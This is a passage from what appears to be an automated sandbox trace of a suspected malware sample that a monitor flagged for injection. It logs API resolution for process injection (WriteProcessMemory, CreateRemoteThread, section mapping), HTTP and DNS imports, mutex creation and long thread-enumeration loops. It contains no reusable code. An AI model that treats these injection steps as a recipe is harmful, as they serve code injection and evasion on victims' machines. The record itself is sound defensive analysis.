returned 1 [0176.688] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.689] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.689] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.689] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.689] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.690] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.690] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.690] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.691] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.691] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.691] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.691] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.692] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.692] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.692] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.692] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.693] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.693] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.693] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.694] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.694] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.694] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.694] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.695] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.695] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.695] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.696] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.696] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.696] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.696] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.697] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.697] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.697] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.698] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.698] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.698] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.698] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.699] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.699] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.699] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.699] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.700] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.700] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.700] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.701] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.701] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.701] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.701] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.702] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.702] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.702] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.702] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.703] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.703] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.703] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.704] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.704] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.704] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.704] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.705] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.705] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.705] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.705] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.706] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.706] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.706] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.707] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.707] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.707] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.707] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.708] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.708] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.708] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.708] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.709] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.709] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.709] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.710] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.710] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.710] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.710] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.711] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.711] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.711] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.711] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.712] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.712] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.712] Thread32Next (hSnapshot=0x9c, lpte=0x2bcf9e4) returned 1 [0176.734] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7e4) returned 0xa0 [0176.734] ResumeThread (hThread=0xa0) returned 0x1 [0176.734] CloseHandle (hObject=0xa0) returned 1 [0176.734] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x98c) returned 0xa0 [0176.734] ResumeThread (hThread=0xa0) returned 0x1 [0176.734] CloseHandle (hObject=0xa0) returned 1 [0176.755] CloseHandle (hObject=0x9c) returned 1 [0176.755] VirtualQuery (in: lpAddress=0x771098, lpBuffer=0x2bcf9d8, dwLength=0x1c | out: lpBuffer=0x2bcf9d8*(BaseAddress=0x771000, AllocationBase=0x750000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.755] GetProcessHeap () returned 0x750000 [0176.755] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x771098 | out: hHeap=0x750000) returned 1 [0176.755] VirtualQuery (in: lpAddress=0x770f88, lpBuffer=0x2bcf9d8, dwLength=0x1c | out: lpBuffer=0x2bcf9d8*(BaseAddress=0x770000, AllocationBase=0x750000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.755] GetProcessHeap () returned 0x750000 [0176.755] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x770f88 | out: hHeap=0x750000) returned 1 [0176.755] RtlExitUserThread (Status=0x0) Process: id = "42" image_name = "population openings.exe" filename = "c:\\program files (x86)\\reference assemblies\\population openings.exe" page_root = "0x65cdc000" os_pid = "0x53c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Reference Assemblies\\population openings.exe\" " cur_dir = "C:\\Program Files (x86)\\Reference Assemblies\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 295 os_tid = 0x988 Thread: id = 296 os_tid = 0xc0 Thread: id = 297 os_tid = 0x4c8 [0176.200] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0176.200] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0176.200] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0176.200] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0176.200] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0176.200] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0176.201] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0176.202] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0176.203] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0176.203] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0176.203] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0176.203] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0176.203] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0176.204] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0176.204] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0176.204] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0176.204] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0176.211] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0176.211] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0176.211] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0176.215] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0176.215] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0176.215] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0176.216] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0176.216] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0176.216] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0176.216] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0176.216] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0176.216] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0176.216] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0176.216] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0176.216] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0176.219] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0176.220] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0176.220] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0176.220] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0176.220] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0176.220] GetProcAddress (hModule=0x75bc0000, lpProcName=0x5) returned 0x75bc7147 [0176.220] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0176.220] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x212fa7c | out: lpflOldProtect=0x212fa7c*=0x40) returned 1 [0176.220] VirtualProtect (in: lpAddress=0xe0000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x212fa7c | out: lpflOldProtect=0x212fa7c*=0x4) returned 1 [0176.221] VirtualQuery (in: lpAddress=0xf0016, lpBuffer=0x212fa74, dwLength=0x1c | out: lpBuffer=0x212fa74*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x40, RegionSize=0x1000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0176.221] GetProcessHeap () returned 0x780000 [0176.221] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x364) returned 0x7a0cc8 [0176.221] RtlMoveMemory (in: Destination=0x7a0cc8, Source=0xf0016, Length=0x363 | out: Destination=0x7a0cc8) [0176.221] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xf0016) returned 0x0 [0176.221] GetCurrentProcessId () returned 0x53c [0176.221] GetProcessHeap () returned 0x780000 [0176.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x105) returned 0x7a1038 [0176.222] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x7a1038, nSize=0x104 | out: lpFilename="C:\\Program Files (x86)\\Reference Assemblies\\population openings.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\population openings.exe")) returned 0x43 [0176.222] GetProcessHeap () returned 0x780000 [0176.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x105) returned 0x7a1148 [0176.222] GetCurrentProcessId () returned 0x53c [0176.222] wsprintfA (in: param_1=0x7a1148, param_2="%s%d%d%d" | out: param_1="C:\\Program Files (x86)\\Reference Assemblies\\population openings.exe37084212413403") returned 81 [0176.222] CryptAcquireContextA (in: phProv=0x212fa78, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x212fa78*=0x7a1298) returned 1 [0176.237] CryptCreateHash (in: hProv=0x7a1298, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x212fa7c | out: phHash=0x212fa7c) returned 1 [0176.237] lstrlenA (lpString="C:\\Program Files (x86)\\Reference Assemblies\\population openings.exe37084212413403") returned 81 [0176.237] CryptHashData (hHash=0x7a1bc8, pbData=0x7a1148, dwDataLen=0x51, dwFlags=0x0) returned 1 [0176.237] CryptGetHashParam (in: hHash=0x7a1bc8, dwParam=0x2, pbData=0x212fa68, pdwDataLen=0x212fa80, dwFlags=0x0 | out: pbData=0x212fa68, pdwDataLen=0x212fa80) returned 1 [0176.237] wsprintfA (in: param_1=0x7a1148, param_2="%02X" | out: param_1="BD") returned 2 [0176.237] wsprintfA (in: param_1=0x7a114a, param_2="%02X" | out: param_1="89") returned 2 [0176.237] wsprintfA (in: param_1=0x7a114c, param_2="%02X" | out: param_1="C1") returned 2 [0176.237] wsprintfA (in: param_1=0x7a114e, param_2="%02X" | out: param_1="D7") returned 2 [0176.237] wsprintfA (in: param_1=0x7a1150, param_2="%02X" | out: param_1="BC") returned 2 [0176.237] wsprintfA (in: param_1=0x7a1152, param_2="%02X" | out: param_1="F4") returned 2 [0176.237] wsprintfA (in: param_1=0x7a1154, param_2="%02X" | out: param_1="D1") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1156, param_2="%02X" | out: param_1="88") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1158, param_2="%02X" | out: param_1="0B") returned 2 [0176.238] wsprintfA (in: param_1=0x7a115a, param_2="%02X" | out: param_1="F4") returned 2 [0176.238] wsprintfA (in: param_1=0x7a115c, param_2="%02X" | out: param_1="4A") returned 2 [0176.238] wsprintfA (in: param_1=0x7a115e, param_2="%02X" | out: param_1="CE") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1160, param_2="%02X" | out: param_1="15") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1162, param_2="%02X" | out: param_1="8F") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1164, param_2="%02X" | out: param_1="30") returned 2 [0176.238] wsprintfA (in: param_1=0x7a1166, param_2="%02X" | out: param_1="55") returned 2 [0176.238] CryptDestroyHash (hHash=0x7a1bc8) returned 1 [0176.238] CryptReleaseContext (hProv=0x7a1298, dwFlags=0x0) returned 1 [0176.238] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="BD89C1D7BCF4D1880BF44ACE158F3055") returned 0x94 [0176.238] GetLastError () returned 0x0 [0176.238] Sleep (dwMilliseconds=0x1f4) [0176.756] GetCurrentProcessId () returned 0x53c [0176.756] GetCurrentThreadId () returned 0x4c8 [0176.756] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x9c [0176.759] Thread32First (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.759] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.759] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.759] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.760] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.760] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.760] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.760] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.761] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.761] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.761] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.762] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.762] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.762] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.762] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.763] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.763] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.763] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.763] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.764] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.764] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.764] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.765] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.765] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.765] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.765] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.766] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.766] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.766] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.766] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.767] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.767] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.767] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.768] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.768] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.768] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.768] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.769] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.769] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.769] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.769] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.770] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.770] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.770] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.771] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.771] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.771] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.771] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.772] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.772] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.773] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.773] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.773] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.773] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.774] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.774] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.774] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.774] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.775] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.775] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.775] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.776] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.776] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.776] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.776] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.777] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.777] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.777] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.777] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.778] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.778] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.778] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.779] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.779] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.779] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.779] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.780] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.780] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.780] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.780] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.781] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.781] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 1 [0176.781] Thread32Next (hSnapshot=0x9c, lpte=0x212fa6c) returned 